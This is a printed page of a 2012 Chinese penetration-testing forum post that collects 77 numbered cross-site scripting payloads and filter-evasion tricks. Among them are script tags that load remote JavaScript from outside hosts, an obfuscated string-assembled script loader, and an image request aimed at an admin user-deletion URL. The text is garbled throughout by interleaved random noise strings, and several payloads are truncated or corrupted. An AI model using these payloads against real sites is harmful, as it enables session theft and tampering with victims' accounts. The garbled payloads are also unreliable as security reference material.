中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 g3 G1 h$ t* ?% F- Y. `
0 I5 u$ y. G+ F$ k) b9 f (1)普通的XSS JavaScript注入
* A# G  w, J- S: E <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 N) ]; k) v/ t8 y3 s$ Y5 ^% a* ?; d; c" R, c! O
(2)IMG标签XSS使用JavaScript命令
' `  h$ P8 j, E7 X) C# ^0 F9 Y, b) S <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( q; d- Z7 U9 i1 r% P5 R. O. Z9 I: k: {- Q' {2 _
(3)IMG标签无分号无引号
8 a  T$ S2 v! D5 V+ | <IMG SRC=javascript:alert(‘XSS’)>
  N' j: h, r, s- N4 q' {
9 S! d2 Q  g- j* Z (4)IMG标签大小写不敏感; I- G' T! x0 d; h
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ D8 H3 a) o8 u: M* `: [* S

# U, s! @0 w( W/ _ (5)HTML编码(必须有分号)0 u& i! x5 V: I: s& N. t
<IMG SRC=javascript:alert(“XSS”)>
8 {. e9 _/ e# ]" }
5 O: }2 Q% ]- O) {! M$ _ (6)修正缺陷IMG标签
2 w( r- q5 i: e0 p" G# s <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 G' w% i: b; c8 ~  Q
6 z8 |/ T. p8 r3 Q* Q
(7)formCharCode标签(计算器)
6 [( x6 Q( v$ x2 G: F. P7 e- N6 S <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 R) ^6 w: S& Q9 g- n' T  a
8 B' {# L7 W+ R3 p& ~6 z2 g. j$ ~
(8)UTF-8的Unicode编码(计算器)8 b/ T! _$ A/ ?! ]; w; Q
<IMG SRC=jav..省略..S')>
, [" p; l# k9 s& B/ b
2 A' B5 B) Q& c; R0 ~( ]9 k% l (9)7位的UTF-8的Unicode编码是没有分号的(计算器)% P% W' G& ]3 M
<IMG SRC=jav..省略..S')>4 [' y: ^( p& I
- Z9 [2 N8 j1 l( R# ]9 u. k/ M
(10)十六进制编码也是没有分号(计算器)* s3 Y6 v+ L$ ?
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>8 z( I0 Y& l: l2 {0 w
" C0 [8 w# j8 S2 [
(11)嵌入式标签,将Javascript分开$ O) _, b- L1 @$ O; D& O
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 I) D3 k7 n+ m+ E- \
  u& N2 A& }! Q# m; r$ j: v (12)嵌入式编码标签,将Javascript分开
6 i, l9 }. B# O9 \- t: p <IMG SRC=”jav ascript:alert(‘XSS’);”>
; r. D2 X) d, D  p0 O* O1 Z7 L7 Q- y2 I1 \; x1 E' k- I; t
(13)嵌入式换行符' j* w, A3 U' m
<IMG SRC=”jav ascript:alert(‘XSS’);”>. T8 o) H3 K, G3 A' ~% V/ _; ]
8 _+ e# i: w/ ?) o
(14)嵌入式回车
/ D! a6 l/ ^; K  g& k& L7 W <IMG SRC=”jav ascript:alert(‘XSS’);”>
% A# U5 Z4 L5 w, f, x7 S2 D
3 I5 J4 A- H% n5 U (15)嵌入式多行注入JavaScript,这是XSS极端的例子+ b" [3 k) d/ ]* j
<IMG SRC=”javascript:alert(‘XSS‘)”>) A6 X  m: R4 d( E: I
4 {' c7 d' w7 v! V* j$ |
(16)解决限制字符(要求同页面)
% Z& [  x! l' }* M1 k <script>z=’document.’</script>3 i4 Z2 \/ a. _- C
<script>z=z+’write(“‘</script>$ p! U/ w2 {1 z9 P
<script>z=z+’<script’</script>
7 n' ^) H' N4 m) E: W# l <script>z=z+’ src=ht’</script>6 L* x5 L9 y/ ]' _: q, K  s
<script>z=z+’tp://ww’</script>
9 ]; S+ a) n$ |0 B <script>z=z+’w.shell’</script>6 Y9 q3 B7 Q( F1 W
<script>z=z+’.net/1.’</script>
2 @. ?( h1 s. f6 i" ] <script>z=z+’js></sc’</script>) ^1 s2 S% }0 J
<script>z=z+’ript>”)’</script>
% |* h/ T" T( ?/ @6 u <script>eval_r(z)</script>7 V; j1 n* G$ v5 |8 _

8 F& ~. r3 Y: T- O (17)空字符$ Y; E/ \8 p3 n& f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; k. @0 G: @8 z' h9 V

0 s# @2 e! ~/ P0 ~* W9 q; C" z4 } (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( [' s( `3 H  r8 h
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ ]0 A% T0 G, g1 v9 J

9 U& u/ z3 d: y( Z: K+ [8 s. ?- w3 |0 k (19)Spaces和meta前的IMG标签
+ x, C; x. C; I$ u, r" \9 K <IMG SRC=”   javascript:alert(‘XSS’);”>
. @  J9 w& h/ j. K
! Y2 h5 i) j0 S1 ?/ w' H# Z (20)Non-alpha-non-digit XSS
9 G* X0 U& n4 g8 P% k& V <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! b" h6 l; u; _3 H
8 f) `2 W0 C) z- _
(21)Non-alpha-non-digit XSS to 2
  e+ S4 M! a3 Q  t0 b; H5 C <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ k: t8 I2 u( S' t' j% n' \% M0 v
(22)Non-alpha-non-digit XSS to 3
- O; V+ e; l9 g" Q0 W; { <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># @7 h( L( Z) S& @
' e& l1 W' R& h) T
(23)双开括号
& H, A- L% o7 n; Q6 Y) u <<SCRIPT>alert(“XSS”);//<</SCRIPT>
1 I2 O! @/ |4 F+ J8 G% s9 v/ a7 K8 x5 ~2 f( e( ]4 Y0 U
(24)无结束脚本标记(仅火狐等浏览器): E( ?. [6 q) F3 X6 n2 X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ E" w7 P, u# \% ^' g! ~) o; d) |6 M# }( G! ?- g
(25)无结束脚本标记21 `, j" e# ~; ~. l# i4 t4 n
<SCRIPT SRC=//3w.org/XSS/xss.js>+ z' U+ C  [( y& y5 S
$ l) D. V0 q  J' e) G- F8 e
(26)半开的HTML/JavaScript XSS
! O! j1 @) X3 L" v- b( R: ? <IMG SRC=”javascript:alert(‘XSS’)”6 k9 Y3 B3 v& K9 A3 K

' T$ L3 ]9 @& R1 ~, b (27)双开角括号5 m1 p9 a- t$ ^- b) @
<iframe src=http://3w.org/XSS.html <# h" y/ A" r/ Q4 T2 F
7 I" {( X; r/ {4 x0 k
(28)无单引号 双引号 分号3 b/ ]& \# Z( w( G  D3 O( m  v/ B
<SCRIPT>a=/XSS/. s, [7 }3 k8 ^, {: w) m6 W
alert(a.source)</SCRIPT>, |8 L. `0 a. q8 }! A: l, E1 Z* ?

8 h4 {5 A) @1 W- U3 S9 D! F+ d: h2 W (29)换码过滤的JavaScript0 d9 T( r9 \: F) E' H1 I
\”;alert(‘XSS’);//1 h( T1 e6 ?2 k- \$ f9 N8 I' u
# d; N1 H! V5 U5 g
(30)结束Title标签! w: N) i1 |( m* {1 y. M: h
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 l0 S# {* b# X/ A  {* d
' q0 n8 B3 s; j: S/ X( S (31)Input Image
6 Q; r! q* ^, S- _; X <INPUT SRC=”javascript:alert(‘XSS’);”>
' U; l$ @9 g- Q" U/ Z, X: z! M9 z5 S# P8 X' Q- d6 x
(32)BODY Image0 U: M; u$ t( t& \* n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  \" a% s8 B1 m  U7 G9 p0 H- q( d
. z: E# P0 ^5 T% W! e4 U (33)BODY标签" x& n2 S; p, w4 ]; G
<BODY(‘XSS’)>
0 N* M. r/ \( r- b8 d
3 q, H: i& }/ L+ I$ e (34)IMG Dynsrc# }# X& m$ K( l' }9 N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>( L1 {! `# b: N# f  k6 J

+ R/ D& m$ `: k" [1 J5 F) a4 N (35)IMG Lowsrc
3 K2 V* R0 E2 c" n" b. h <IMG LOWSRC=”javascript:alert(‘XSS’)”>
, {" `5 j' Q7 J! c, [4 g4 ~; e
: X4 W" f1 g: f0 b# {' K (36)BGSOUND
6 z# y5 g5 y, J <BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 k; M( f; }. j6 L% U( R
1 C# o7 T' A5 H1 n) |* k: a (37)STYLE sheet: L3 Q& T+ f0 |1 R
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, v- q/ s, l9 }6 E( w

* K9 l6 o( p& B. C& H" x2 T+ Z; ^ (38)远程样式表
3 k# A' ], L* F3 G! b <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# o0 B. G3 A/ h# \5 u$ ^
3 `9 q" F6 I* b/ X (39)List-style-image(列表式)! V$ d# z" [' [
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& _0 }  J1 \8 t2 Y7 E, f5 {# D& I6 u" W4 F" P! I& g# ~; v" d  K* x
(40)IMG VBscript7 b1 F, l) k8 A4 \* J3 V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
  H- |5 ^( k/ `  K- |$ e
, `7 l3 G' Q( \4 _- r6 e (41)META链接url  F& W7 d5 c% e+ Z. h' |$ k
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>) d( }, v. [) o( t2 D( I: ?: b! o
( S+ g" I9 T. J5 I8 j( t( o) C4 j* O& v$ O
(42)Iframe& ^4 s5 |8 [$ E; p+ D7 H8 _: j5 F
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>% J! {  a9 a, r' g

, e, S, `  m0 \; U' s& q* O (43)Frame
: ]1 p: F8 a8 t% B8 ]  M" w4 B <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
$ q; z4 j" ], z
  k7 b' r. [3 g. T! T' @2 t (44)Table% K! `$ y! B* |+ b, _3 ?
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* o& O) x5 @: E4 A

5 C  N( j" {3 o6 M6 A (45)TD" P* B2 T, b/ ~4 @& x4 H
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, U, H: H+ U; R, H' F, B1 A* S& W" m5 O* ^
(46)DIV background-image" d; k4 j3 l0 w' T3 z0 F$ ^; O8 G- H
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 ]( O  |+ x5 A) M0 X  k
+ c5 S7 {5 \) Y, j3 ~) k3 ]- H# x# k
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& ~% f; j- H) |6 X- | <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 Y9 [% L  ^+ V) P% v6 S3 X# M

3 l! Q/ ~7 F' v! b (48)DIV expression
) G: F4 [" f* A/ ^$ X <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 k5 `; x8 ?' \9 n! R1 B+ g6 C! f
(49)STYLE属性分拆表达+ W" `0 K0 C$ J0 A; v
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" q2 ?- c/ V. o$ f, v( j6 P/ s1 ?) [+ S
7 M: a/ Y! w/ u( l% A  l) v (50)匿名STYLE(组成:开角号和一个字母开头)
; O  K# J. X2 R) o, s) k  d/ N <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( r3 Q  Q# M1 @4 ^9 l  ^
# L; U3 B' _8 ^5 X0 y* g (51)STYLE background-image
$ z9 P6 a) w: t7 o <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" C6 Z2 F/ B. a/ D) |& j  O  ?; h* Z
4 C9 r/ d0 s1 B3 W$ s( E+ L. ~: C (52)IMG STYLE方式. Q4 f4 i1 x/ A0 g2 p& x
exppression(alert(“XSS”))’>
+ @, B4 z: x" T' g  q! o4 _6 Z8 o' R* f0 I- s$ t6 N, w& A& t
(53)STYLE background' o( K, ]8 S2 {7 n
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>4 O$ @5 l$ d; Z
/ o, z1 S9 `7 ^; {1 {; P
(54)BASE5 ^7 Q; S- C5 g* f$ @& G
<BASE HREF=”javascript:alert(‘XSS’);//”>1 H: o7 F4 |  T% F
( H0 U6 J: \0 `, U2 i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# _* G- T: p6 a4 h5 V8 K9 q
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* b0 M1 v$ V7 u7 p" G# Z  j0 f5 }) Y! I' z7 U
(56)在flash中使用ActionScrpt可以混进你XSS的代码
4 d9 B0 q* V* d a=”get”;
* t' h7 [5 ?$ b" G7 [9 [) S b=”URL(\”";
: \& `% K: a7 X; I' N( S" n. `; } c=”javascript:”;. p& i" `/ ?$ Z8 Y
d=”alert(‘XSS’);\”)”;- Y, j# A$ N* O3 y' `/ Z3 F" X
eval_r(a+b+c+d);
7 I9 r4 D% S& \" y  ?
0 s. B, g! J7 M" o4 ^ (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( B1 G; [$ h0 a, h+ I$ u <HTML xmlns:xss>! Q3 j1 S6 h( b. U: {8 L6 g
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. O" t6 h" `! s <xss:xss>XSS</xss:xss>
& k9 i! a& A+ z5 T$ _3 J, I </HTML>- r8 v  u) ]/ U( P* z
& f. e" \1 C$ l2 G, c. y( t6 j
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* g- d9 L, ^% F  l( O/ \ <SCRIPT SRC=””></SCRIPT>. @: U. @9 {$ _0 ^
1 A9 v; m" n. V7 w/ ^( V
(59)IMG嵌入式命令,可执行任意命令
0 L! P) Y9 }& S0 Z+ N0 a4 E <IMG SRC=”http://www.XXX.com/a.php?a=b”>
. `) @# p' b, t. B# e
5 A/ k* r8 M5 K (60)IMG嵌入式命令(a.jpg在同服务器)
" Z: T- @& q) ^ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' W9 \: D! L" `6 c/ i3 L  r
. r+ `" G5 A+ v8 ^# A' \ (61)绕符号过滤3 N3 P2 i3 W) h# ~
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! C. M/ d4 F3 {$ c& M. v/ ]5 G. b
(62)
% }. R  R; {7 i+ u$ ? <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' ?# q  S6 {* g/ e5 ]
0 t! y' M! i4 ^8 K (63)
1 P2 u% B) s% x. e <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 A( m6 l% x# z2 Z& a2 E
, i, o3 K6 S7 F
(64)- {. b2 @' z- o" L0 ~" i
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) _7 R. V; g/ x/ i  o6 w
; [8 `& ~8 ~7 d$ I2 [ (65)' Y* r, E2 m+ e& p3 K2 [. A- i
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
& \8 j, i& P1 d7 q
2 W/ H4 _2 P+ M. d7 \. g0 ^0 q; X (66)# w; s0 n3 n; c. S
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 U9 ~2 J8 ?) D. v% t# {4 d* i' v3 t+ R; I( N! o
(67)# w+ N7 l! D) w4 e# g
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>9 S* e& S0 _) X8 h9 b

9 i  n  `$ ?6 B; ^$ @6 M (68)URL绕行
3 b1 r$ q% c+ v# w0 g7 O/ p <A HREF=”http://127.0.0.1/”>XSS</A>% a5 N) p) h1 `- m) D

" v8 H8 v& J; ?( e (69)URL编码
5 C3 p' p4 f. u6 }" i' Y/ \! } <A HREF=”http://3w.org”>XSS</A>  v) \1 g4 q5 }- j
6 ?) I2 r' O& A$ I5 Q; }7 |
(70)IP十进制6 |& P( E3 A6 P+ E! o$ E
<A HREF=”http://3232235521″>XSS</A>
. `- Y  e6 C; R; j
. A0 I/ V& }3 n (71)IP十六进制  ]0 X" J5 r0 c4 m
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>* F4 U0 M+ \6 Z
; U/ K; Q0 s' _1 ~# v
(72)IP八进制1 c' ^0 o' ?& a$ ^
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 {7 O6 d* i) g
4 o# o% H$ v9 z1 i' ? (73)混合编码
& I# q# h# c- i! g <A HREF=”h
3 Q& x- b4 y% }& }3 z$ N. l+ p tt p://6 6.000146.0×7.147/”">XSS</A>
: n" f$ @$ U' c
( ~3 j3 h) @9 ?3 S5 ~ (74)节省[http:]- O( _/ M' u5 g$ H  k4 q3 B  |8 E
<A HREF=”//www.google.com/”>XSS</A>
+ M" e# l( v6 `' o4 M% y7 z: n3 u7 o( M7 r2 o( W8 ^' I
(75)节省[www]
# ~% r4 `* E0 k  }: H <A HREF=”http://google.com/”>XSS</A>
% Z8 ^+ V- ?' ^9 U- B* p; k! w
& x! M9 E+ k& R (76)绝对点绝对DNS4 F5 Q. X$ |% e' h
<A HREF=”http://www.google.com./”>XSS</A>
8 ^. U; H" ^0 \# ~, g: Z3 k
% U, G' [7 a/ S/ a7 Z" l: w) c) r (77)javascript链接$ A1 [6 _) \5 ^% r7 q
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2